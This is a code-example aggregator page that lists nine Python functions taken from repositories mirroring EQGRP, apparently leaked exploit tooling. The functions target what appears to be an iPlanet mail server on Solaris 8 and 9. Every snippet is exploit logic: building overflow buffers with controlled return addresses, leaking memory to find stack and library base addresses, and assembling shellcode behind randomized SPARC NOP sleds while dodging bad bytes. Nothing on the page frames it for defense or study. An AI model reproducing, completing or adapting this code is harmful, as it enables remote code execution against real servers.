Python stringifyAddr示例，utils.stringifyAddr Python示例

示例#1

0

显示文件

文件： solaris9.py 项目： zymcn1550/EQGRP

 def validReply(self, target, reply, stackBase):
    got = utils.stringifyAddr(target.got[0])
    for i in target.got[1:]:
       got += utils.stringifyAddr(target.imtaBase + i)
    validResponse = got[0:13] + "\r\n"
    if (validResponse == reply):
       return True
    return False

示例#2

0

显示文件

文件： iplanet.py 项目： zymcn1550/EQGRP

 def buildBounceBuffer(self):
    imtaBase = self.imtaBase
    baseBuf = self.buildBaseBuffer(imtaBase)
    l7 = (imtaBase + self.l7Imta) + self.l7Offset
    fp = imtaBase + self.fp
    filler = utils.buildBuffer(0x18, self.badBytes)
    bounceBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler \
                + utils.stringifyAddr(fp) \
                + utils.stringifyAddr(self.pc - 8)
    return bounceBuf

示例#3

0

显示文件

文件： iplanet.py 项目： zymcn1550/EQGRP

   def buildImtaLeakBuffers(self, imtaBase):
      baseBuf = self.buildBaseBuffer(imtaBase)
      l7 = (imtaBase + self.l7Imta) + self.l7Offset
      filler = utils.buildBuffer(4, self.badBytes)
      leakBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler		# filler is necessary in case we
					# get 0x20 as the last byte in l7
      response = imtaBase + self.l7ImtaResponse
      matchBuf = utils.stringifyAddr(response) \
                 + utils.stringifyAddr(0) \
                 + "01234\r\n"
      return leakBuf, matchBuf

示例#4

0

显示文件

文件： iplanet.py 项目： zymcn1550/EQGRP

 def buildBaseBuffer(self, imtaBase):
    filler = utils.buildBuffer(self.baseBufLen, self.badBytes)
    conn = self.conn
    found = False
    while ((not found) and (conn < len(self.addrs))):
       addr = imtaBase + self.addrs[conn]
       conn += 1
       if (not utils.intHasBadBytes(addr, self.badBytes)):
          found = True
    self.conn = conn
    if (not found):
       raise IndexError()
    baseBuf = filler[0x0:0x104] \
              + utils.stringifyAddr(addr) \
              + filler[0x108:0x120] \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + filler[0x12c:0x134] \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + filler[0x140:0x17c] \
              + utils.stringifyAddr(addr) \
              + filler[0x180:]
    return baseBuf

示例#5

0

显示文件

文件： solaris9.py 项目： zymcn1550/EQGRP

 def buildShellcodeBuffer(self, target, challenge):
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
       pc += 4
    socketLoc = stackBase + target.socketOffset
    solaris9shellcode.socket_offset = \
       utils.stringifyAddr(socketLoc - (pc + 8))
    solaris9shellcode.challenge = \
       utils.stringifyAddr(challenge);
    filler = utils.buildBuffer(pc - basePC, target.badBytes)
    shellcodeBuf = filler \
                   + solaris9shellcode.build()
    target.pc = pc
    return shellcodeBuf

示例#6

0

显示文件

文件： solaris.py 项目： zymcn1550/EQGRP

 def buildStackLeakBuffer(self, target, stackBase):
     baseBuf = target.buildBaseBuffer(target.imtaBase)
     l7 = (stackBase + self.l7Stack) + target.l7Offset
     filler = utils.buildBuffer(4, target.badBytes)
     leakBuf = baseBuf \
               + utils.stringifyAddr(l7) \
               + filler  # filler is necessary in case we
     # get 0x20 as the last byte in l7
     return leakBuf

示例#7

0

显示文件

文件： solaris.py 项目： Brainiarc7/EQGRP

   def buildStackLeakBuffer(self, target, stackBase):
      baseBuf = target.buildBaseBuffer(target.imtaBase)
      l7 = (stackBase + self.l7Stack) + target.l7Offset
      filler = utils.buildBuffer(4, target.badBytes)
      leakBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler		# filler is necessary in case we
					# get 0x20 as the last byte in l7
      return leakBuf

示例#8

0

显示文件

文件： solaris8.py 项目： zymcn1550/EQGRP

 def buildShellcodeBuffer(self, target):
     stackBase = target.stackBase
     basePC = stackBase + target.bigBufOffset
     pc = basePC
     while (utils.intHasBadBytes(pc - 8, target.badBytes)):
         pc += 4
     solaris8shellcode.stackbase = \
        utils.stringifyAddr(stackBase + self.l7Stack)
     solaris8shellcode.socket_offset = \
        utils.stringifyAddr(target.socketOffset)
     badRegs = range(0, 8) + [14, 30, 31]  # global regs, sp, fp, and i7
     shellcode = solaris8shellcode.build()
     sledLen = (target.bigBufLen - len(shellcode)) / 4
     sled = ''
     for i in range(0, sledLen):
         nop = utils.randomSparcNOP(badRegs, target.badBytes)
         sled += utils.stringifyAddr(nop)
     shellcodeBuf = sled \
                    + shellcode
     target.pc = pc
     return shellcodeBuf

示例#9

0

显示文件

文件： solaris8.py 项目： Brainiarc7/EQGRP

 def buildShellcodeBuffer(self, target):
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
       pc += 4
    solaris8shellcode.stackbase = \
       utils.stringifyAddr(stackBase + self.l7Stack)
    solaris8shellcode.socket_offset = \
       utils.stringifyAddr(target.socketOffset)
    badRegs = range(0, 8) + [14, 30, 31]	# global regs, sp, fp, and i7
    shellcode = solaris8shellcode.build()
    sledLen = (target.bigBufLen - len(shellcode)) / 4
    sled = ''
    for i in range(0, sledLen):
       nop = utils.randomSparcNOP(badRegs, target.badBytes)
       sled += utils.stringifyAddr(nop)
    shellcodeBuf = sled \
                   + shellcode
    target.pc = pc
    return shellcodeBuf